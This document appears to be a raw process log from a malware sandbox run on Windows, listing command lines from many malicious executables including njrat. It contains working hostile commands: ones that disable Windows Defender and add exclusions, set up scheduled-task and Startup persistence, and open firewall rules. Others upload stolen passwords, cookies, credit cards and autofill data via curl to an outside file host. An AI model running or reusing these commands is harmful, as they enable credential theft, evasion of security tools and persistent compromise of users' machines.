"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=410FBA09A22902ABE057E6D4DEBDFF5C --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=410FBA09A22902ABE057E6D4DEBDFF5C --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E3300027980912A10EC44DF1828698C5 --mojo-platform-channel-handle=2332 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A897585BE282A36C03503C698E57DE96 --mojo-platform-channel-handle=1960 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=2478C43556F96753CFBF5CAEEA5B95BB --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=2478C43556F96753CFBF5CAEEA5B95BB --renderer-client-id=6 --mojo-platform-channel-handle=2552 --allow-no-sandbox-job /prefetch:1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4280B938C92B6465C2A2438DE9230C00 --mojo-platform-channel-handle=2832 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAUAByAG8AZAB1AGMAdAAuAGUAeABlADsA
C:\Users\Admin\Desktop\4363463463464363463463463\Files\g9win6bb.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\g9win6bb.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Filezilla.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Dragon Dragon.bat & Dragon.bat
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\c1.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\c1.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Documents\OUCH_SOKHENG.pdf"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0x11c,0x12c,0x7ff802cd46f8,0x7ff802cd4708,0x7ff802cd4718
C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\njrat.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\njrat.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 609587
C:\Windows\SysWOW64\findstr.exe
findstr /V "outputdiffswalnutcontainer" Sufficient
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,1795154957606306922,16036559703329824725,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,1795154957606306922,16036559703329824725,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2432 /prefetch:3
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Combine + ..\Transportation + ..\Chef k
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,1795154957606306922,16036559703329824725,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\609587\Horizon.pif
Horizon.pif k
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1795154957606306922,16036559703329824725,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1795154957606306922,16036559703329824725,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3692 /prefetch:1
C:\Users\Admin\Desktop\New Text Document mod.exse\a\main.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\main.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\tmp.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\tmp.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "Windows" /tr "wscript //B 'C:\Users\Admin\AppData\Local\Sync360 Sphere Elite Technologies Co\Sync360Sphere.js'" /sc minute /mo 5 /F
C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\cv.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\main.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\main.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sync360Sphere.url" & echo URL="C:\Users\Admin\AppData\Local\Sync360 Sphere Elite Technologies Co\Sync360Sphere.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sync360Sphere.url" & exit
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "Windows" /tr "wscript //B 'C:\Users\Admin\AppData\Local\Sync360 Sphere Elite Technologies Co\Sync360Sphere.js'" /sc minute /mo 5 /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c mode con: cols=125 lines=35
C:\Windows\system32\mode.com
mode con: cols=125 lines=35
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1795154957606306922,16036559703329824725,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4044 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,1795154957606306922,16036559703329824725,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4316 /prefetch:1
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\System32\wbem\WMIC.exe csproduct get UUID
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Windows\rundll32.exe
"C:\Windows\rundll32.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\client.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\client.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_6700_133786559434265760\client.exe
C:\Users\Admin\Desktop\4363463463464363463463463\Files\client.exe
C:\Users\Admin\Desktop\4363463463464363463463463\Files\4434.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\4434.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\DivineDialogue.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\dayum.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\dayum.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c move Prerequisite Prerequisite.bat & Prerequisite.bat
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\rundll32.exe" "rundll32.exe" ENABLE
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa opssvc"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 115839
C:\Windows\SysWOW64\findstr.exe
findstr /V "ISTTRANSACTIONSCONFCOMMENTARY" Grew
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Butter + ..\Community + ..\Efficiently + ..\Tyler + ..\Seas + ..\California + ..\Skip + ..\Publisher + ..\Disappointed + ..\We + ..\Ll + ..\Time + ..\Terrible + ..\Anal + ..\Fleece + ..\Always + ..\Tcp l
C:\Users\Admin\AppData\Local\Temp\115839\Leaving.pif
Leaving.pif l
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\SYSTEM32\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SafeHarbor.url" & echo URL="C:\Users\Admin\AppData\Local\SecureCloud Harbor Inc\SafeHarbor.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SafeHarbor.url" & exit
C:\Users\Admin\AppData\Local\Temp\server.exe
"C:\Users\Admin\AppData\Local\Temp\server.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\2020.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\2020.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\2020.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\2020.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\freedom.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\freedom.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE
C:\Users\Admin\Desktop\New Text Document mod.exse\a\shost.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\shost.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\shost.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\shost.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\qhos.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\qhos.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\qhos.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\qhos.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"
C:\Windows\system32\taskkill.exe
taskkill /im firefox.exe /t /f
C:\Users\Admin\Desktop\New Text Document mod.exse\a\phost.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\phost.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\phost.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\phost.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\in.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\in.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\48D2.tmp\48D3.tmp\48D4.bat "C:\Users\Admin\Desktop\New Text Document mod.exse\a\in.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\New Text Document mod.exse\a\phost.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\New Text Document mod.exse\a\phost.exe'
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/homboz/arht/releases/download/seht/archive.htm/' -outfile archive.htm"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\NEOFreeSetup.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\NEOFreeSetup.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /I "C:\Program Files (x86)\Common Files\Wise Installation Wizard\WIS0E7C0CA4E536483D943BE977EA796DD9_1_0_0_182.MSI" WISE_SETUP_EXE_PATH="C:\Users\Admin\Desktop\New Text Document mod.exse\a\NEOFreeSetup.exe"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 6C3ADD092494D81E5030525BA0D8D59B C
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Users\Admin\Desktop\4363463463464363463463463\Files\nothjgdwa.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\nothjgdwa.exe"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile
